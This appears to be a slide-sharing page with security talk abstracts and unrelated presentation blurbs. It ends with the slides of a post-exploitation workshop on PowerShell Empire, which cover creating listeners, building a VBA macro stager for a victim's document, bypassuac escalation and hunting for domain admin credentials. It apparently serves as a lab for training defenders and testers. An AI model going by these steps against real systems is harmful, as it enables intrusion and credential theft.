Ensuring users have access to only the resources they need, aka least privilege is great. But have you considered granting users only needed access?
This talk will introduce the concept of granting ‘Just-in-Time Access’. Securing an endpoint is more than patching and vulnerability management. Granting access to who, when and what also secures an endpoint. Only when a user needs to connect to a system, can access be granted. Ports such as SSH do not need to be open for the world to connect and probe. Database credentials do not need to last forever.
This approach limits the damage that can be caused by an account -- privileged or otherwise -- by reducing the amount of time an attacker has to gain access to the account, as well as the time they have to move from a compromised account before losing access.
The short explanation for Just-in-Time Access is providing short-term access in real time. It is a relatively new term in the industry and is another way to practice the least privileged best practice.
Key Takeaways:
• The benefits to Just-in-Time access for security and operations
o Improved visibility
o Minimize damage from compromised accounts
o Operational efficiency
• How SSH can be replaced with AWS SSM sessions
o Direct SSH replacement
o SSH reverse proxy
• How Just in Time Access for database credentials can help
o Example: Hashicorp Vault
o Example: Akeyless
• Resources for learning more
Communication to the business is very different to exploitation. This talk helps bridge the gap between a finding and a business risk.
Presented at HackFest 2018
Human(e) Security in a World of Business 2018Haydn Johnson
Relationship Building in Security is extremely important.
Understand where I came from, where I am at, struggles I had and things I found work to help improve the security Posture of my organizaiton.
This document outlines how to conduct Purple Team exercises using the Cyber Kill Chain and Extended Cyber Kill Chain frameworks. It discusses:
- Terminology related to purple teaming, red teaming, and blue teaming.
- The purple team process of conducting focused penetration testing with clear training objectives for the blue team.
- The Cyber Kill Chain and Extended Cyber Kill Chain models and how they can be used for exercises.
- Other frameworks like ATT&CK that can aid exercises.
- The different phases and teams involved in cyber exercises.
- Examples of exercises that could be done using various tools and techniques mapped to the kill chains, like port scanning with Nmap and collecting credentials with Mim
Purple Teaming is the idea of using a Red Team exercise with clear training objectives for the Blue Team.
Great exercises should not just be focused on testing a product, they should also test your active Blue Team members and their skills. But how does one start to think about a Purple Team exercise, how does one go about running one and what does it look like?
In this talk we will explain what, why and how, to plan an effective purple team exercise and give some examples. Most enterprise networks are Windows heavy so examples will heavily lean on this.
Testing Assumptions, gaps, blind spots is what being proactive is all about. This talk is both for the console folks and non-console folks.
This report is to explain some key commands within Meterpreter that allow you to have some sort of situational awareness. That is, how to gain more insight into system information, the user you currently are and what processes are running among other things.
This document provides a step-by-step guide to creating persistence with PowerSploit and the Veil Framework. It begins by using Veil-Evasion to generate a reverse Meterpreter payload, then extracts the base64 encoded payload to use in a PowerSploit persistence script. PowerSploit is used to generate a persistence script that will execute the payload and send a reverse shell to the attacker whenever a user logs into the victim machine. It also provides an alternative manual method using PowerShell commands directly without the PowerSploit script.
GraphRAG for Life Science to increase LLM accuracyTomaz Bratanic
GraphRAG for life science domain, where you retriever information from biomedical knowledge graphs using LLMs to increase the accuracy and performance of generated answers
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...Tatiana Kojar
Skybuffer AI, built on the robust SAP Business Technology Platform (SAP BTP), is the latest and most advanced version of our AI development, reaffirming our commitment to delivering top-tier AI solutions. Skybuffer AI harnesses all the innovative capabilities of the SAP BTP in the AI domain, from Conversational AI to cutting-edge Generative AI and Retrieval-Augmented Generation (RAG). It also helps SAP customers safeguard their investments into SAP Conversational AI and ensure a seamless, one-click transition to SAP Business AI.
With Skybuffer AI, various AI models can be integrated into a single communication channel such as Microsoft Teams. This integration empowers business users with insights drawn from SAP backend systems, enterprise documents, and the expansive knowledge of Generative AI. And the best part of it is that it is all managed through our intuitive no-code Action Server interface, requiring no extensive coding knowledge and making the advanced AI accessible to more users.
Ivanti’s Patch Tuesday breakdown goes beyond patching your applications and brings you the intelligence and guidance needed to prioritize where to focus your attention first. Catch early analysis on our Ivanti blog, then join industry expert Chris Goettl for the Patch Tuesday Webinar Event. There we’ll do a deep dive into each of the bulletins and give guidance on the risks associated with the newly-identified vulnerabilities.
Letter and Document Automation for Bonterra Impact Management (fka Social Sol...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on automated letter generation for Bonterra Impact Management using Google Workspace or Microsoft 365.
Interested in deploying letter generation automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
This presentation provides valuable insights into effective cost-saving techniques on AWS. Learn how to optimize your AWS resources by rightsizing, increasing elasticity, picking the right storage class, and choosing the best pricing model. Additionally, discover essential governance mechanisms to ensure continuous cost efficiency. Whether you are new to AWS or an experienced user, this presentation provides clear and practical tips to help you reduce your cloud costs and get the most out of your budget.
Have you ever been confused by the myriad of choices offered by AWS for hosting a website or an API?
Lambda, Elastic Beanstalk, Lightsail, Amplify, S3 (and more!) can each host websites + APIs. But which one should we choose?
Which one is cheapest? Which one is fastest? Which one will scale to meet our needs?
Join me in this session as we dive into each AWS hosting service to determine which one is best for your scenario and explain why!
Programming Foundation Models with DSPy - Meetup SlidesZilliz
Prompting language models is hard, while programming language models is easy. In this talk, I will discuss the state-of-the-art framework DSPy for programming foundation models with its powerful optimizers and runtime constraint system.
A Comprehensive Guide to DeFi Development Services in 2024Intelisync
DeFi represents a paradigm shift in the financial industry. Instead of relying on traditional, centralized institutions like banks, DeFi leverages blockchain technology to create a decentralized network of financial services. This means that financial transactions can occur directly between parties, without intermediaries, using smart contracts on platforms like Ethereum.
In 2024, we are witnessing an explosion of new DeFi projects and protocols, each pushing the boundaries of what’s possible in finance.
In summary, DeFi in 2024 is not just a trend; it’s a revolution that democratizes finance, enhances security and transparency, and fosters continuous innovation. As we proceed through this presentation, we'll explore the various components and services of DeFi in detail, shedding light on how they are transforming the financial landscape.
At Intelisync, we specialize in providing comprehensive DeFi development services tailored to meet the unique needs of our clients. From smart contract development to dApp creation and security audits, we ensure that your DeFi project is built with innovation, security, and scalability in mind. Trust Intelisync to guide you through the intricate landscape of decentralized finance and unlock the full potential of blockchain technology.
Ready to take your DeFi project to the next level? Partner with Intelisync for expert DeFi development services today!
5th LF Energy Power Grid Model Meet-up SlidesDanBrown980551
5th Power Grid Model Meet-up
It is with great pleasure that we extend to you an invitation to the 5th Power Grid Model Meet-up, scheduled for 6th June 2024. This event will adopt a hybrid format, allowing participants to join us either through an online Mircosoft Teams session or in person at TU/e located at Den Dolech 2, Eindhoven, Netherlands. The meet-up will be hosted by Eindhoven University of Technology (TU/e), a research university specializing in engineering science & technology.
Power Grid Model
The global energy transition is placing new and unprecedented demands on Distribution System Operators (DSOs). Alongside upgrades to grid capacity, processes such as digitization, capacity optimization, and congestion management are becoming vital for delivering reliable services.
Power Grid Model is an open source project from Linux Foundation Energy and provides a calculation engine that is increasingly essential for DSOs. It offers a standards-based foundation enabling real-time power systems analysis, simulations of electrical power grids, and sophisticated what-if analysis. In addition, it enables in-depth studies and analysis of the electrical power grid’s behavior and performance. This comprehensive model incorporates essential factors such as power generation capacity, electrical losses, voltage levels, power flows, and system stability.
Power Grid Model is currently being applied in a wide variety of use cases, including grid planning, expansion, reliability, and congestion studies. It can also help in analyzing the impact of renewable energy integration, assessing the effects of disturbances or faults, and developing strategies for grid control and optimization.
What to expect
For the upcoming meetup we are organizing, we have an exciting lineup of activities planned:
-Insightful presentations covering two practical applications of the Power Grid Model.
-An update on the latest advancements in Power Grid -Model technology during the first and second quarters of 2024.
-An interactive brainstorming session to discuss and propose new feature requests.
-An opportunity to connect with fellow Power Grid Model enthusiasts and users.
In the rapidly evolving landscape of technologies, XML continues to play a vital role in structuring, storing, and transporting data across diverse systems. The recent advancements in artificial intelligence (AI) present new methodologies for enhancing XML development workflows, introducing efficiency, automation, and intelligent capabilities. This presentation will outline the scope and perspective of utilizing AI in XML development. The potential benefits and the possible pitfalls will be highlighted, providing a balanced view of the subject.
We will explore the capabilities of AI in understanding XML markup languages and autonomously creating structured XML content. Additionally, we will examine the capacity of AI to enrich plain text with appropriate XML markup. Practical examples and methodological guidelines will be provided to elucidate how AI can be effectively prompted to interpret and generate accurate XML markup.
Further emphasis will be placed on the role of AI in developing XSLT, or schemas such as XSD and Schematron. We will address the techniques and strategies adopted to create prompts for generating code, explaining code, or refactoring the code, and the results achieved.
The discussion will extend to how AI can be used to transform XML content. In particular, the focus will be on the use of AI XPath extension functions in XSLT, Schematron, Schematron Quick Fixes, or for XML content refactoring.
The presentation aims to deliver a comprehensive overview of AI usage in XML development, providing attendees with the necessary knowledge to make informed decisions. Whether you’re at the early stages of adopting AI or considering integrating it in advanced XML development, this presentation will cover all levels of expertise.
By highlighting the potential advantages and challenges of integrating AI with XML development tools and languages, the presentation seeks to inspire thoughtful conversation around the future of XML development. We’ll not only delve into the technical aspects of AI-powered XML development but also discuss practical implications and possible future directions.
Best 20 SEO Techniques To Improve Website Visibility In SERPPixlogix Infotech
Boost your website's visibility with proven SEO techniques! Our latest blog dives into essential strategies to enhance your online presence, increase traffic, and rank higher on search engines. From keyword optimization to quality content creation, learn how to make your site stand out in the crowded digital landscape. Discover actionable tips and expert insights to elevate your SEO game.
Skybuffer SAM4U tool for SAP license adoptionTatiana Kojar
Manage and optimize your license adoption and consumption with SAM4U, an SAP free customer software asset management tool.
SAM4U, an SAP complimentary software asset management tool for customers, delivers a detailed and well-structured overview of license inventory and usage with a user-friendly interface. We offer a hosted, cost-effective, and performance-optimized SAM4U setup in the Skybuffer Cloud environment. You retain ownership of the system and data, while we manage the ABAP 7.58 infrastructure, ensuring fixed Total Cost of Ownership (TCO) and exceptional services through the SAP Fiori interface.
Ocean lotus Threat actors project by John Sitima 2024 (1).pptxSitimaJohn
Ocean Lotus cyber threat actors represent a sophisticated, persistent, and politically motivated group that poses a significant risk to organizations and individuals in the Southeast Asian region. Their continuous evolution and adaptability underscore the need for robust cybersecurity measures and international cooperation to identify and mitigate the threats posed by such advanced persistent threat groups.
Generating privacy-protected synthetic data using Secludy and MilvusZilliz
During this demo, the founders of Secludy will demonstrate how their system utilizes Milvus to store and manipulate embeddings for generating privacy-protected synthetic data. Their approach not only maintains the confidentiality of the original data but also enhances the utility and scalability of LLMs under privacy constraints. Attendees, including machine learning engineers, data scientists, and data managers, will witness first-hand how Secludy's integration with Milvus empowers organizations to harness the power of LLMs securely and efficiently.
2. @haydnjohnson
Post Exploitation
● Have gained access
a. Via phishing
b. Via Exploit
c. Via ??
● Want to know where we are in the network
● Want to know WHO we are
● What PERMISSIONS do we have
● Getting a shell is just the beginning :)
2
3. @haydnjohnson
So you have gained access - Now what
● What Box are you on?
○ IP address
○ What platform?
○ Service Pack?
● Normal User or Privileged User?
○ What permissions
○ What can you execute
● What else is out in the Abyss?
○ Network shares
○ Other boxes
○ Where are the domain admins??
3
5. @haydnjohnson
We want to pilfer - quietly as possible
● As small a footprint as possible
● Use native tools
● A scripting language like bash for windows?
● BATCH any good?
5
6. @haydnjohnson
PowerShell - our best friend
● It is native - pretty much guaranteed to be available
● Full .NET access
● Most likely to be whitelisted
● Access to Win32 API
○ Access to Kernel
● Run things in memory!
○ Even assemble binaries
For an amazing explanation read:
http://www.exploit-monday.com/2012/08/Why-I-Choose-PowerShell.html
6
10. @haydnjohnson
Pocketful of goodies!
● Create Listeners easily
○ PowerShell command straight into CMD
○ VBA for excel Macros
○ Ducky scripts
● Agents (C2 comms) are easy to use
● Modules and more modules!
10
18. @haydnjohnson
The plan
1. Install PowerShell Empire
2. Create a listener
3. Execute an Agent on Victim
4. Run modules
5. Escalate to high privileged process as Admin (bypassuac)
6. Look for other shares/boxes to get Domain Admin
a. If classes infrastructure has AD
18
19. @haydnjohnson
Tutorial to Follow Part 1 - Getting Access
https://www.cybrary.it/0p3n/powershell-empire-stagers-1-phishing-office-macro-
evading-avs/
● Covers Installation
● Receiving connection via a VBA Macro
19
21. @haydnjohnson
Create a Listener
“listeners” - switch to listeners mode
“options” | “info” - view options to configure
“set Name Test1” - Set a name for listener
“execute” - activates the listener
21
22. @haydnjohnson
Create a macro
“usestager macro Test” - create macro for the listener named Test
“options” - ensure listener is connected
“execute” - will create a file with VBA code
Add code from Macro into Victims Excel/Word document.
Execute file and receive agent
If no excel/word use “usestager launcher”, copy and paste into CMD
22
24. @haydnjohnson
Tutorial To Follow Part 2 - Controlling your agent
https://www.cybrary.it/0p3n/powershell-empire-stagers-2-controlling-victims-
machine/
Opened file - should have an agent
“agents” - will take you to the listing of agents
“interact ABCDEDINDF” - select the agent to interact with.
“sysinfo” - gain information about your victim
“usemodule” <tab> - gain a list of all the awesomeness
24
25. @haydnjohnson
Useful commands
● >Git clone https://github.com/PowerShellEmpire/Empire.git
● >Listeners
○ List & create listeners
● >Usestager launcher
○ Usestager <tab> to see other launchers :)
● >Agents
○ >sysinfo - list system info agent is on
● >usemodule <tab>
● Bypassuac <2nd listener>
25
26. @haydnjohnson
Goals
Find a flag - you have local admin access, there is a flag on an open share. Find it
Get Domain Admin credentials - you may need to ‘hunt’ for a domain admin
26
27. @haydnjohnson
Any other fun stuff we can do?
Detailed case study:
https://enigma0x3.net/2016/01/28/an-
empire-case-study/
27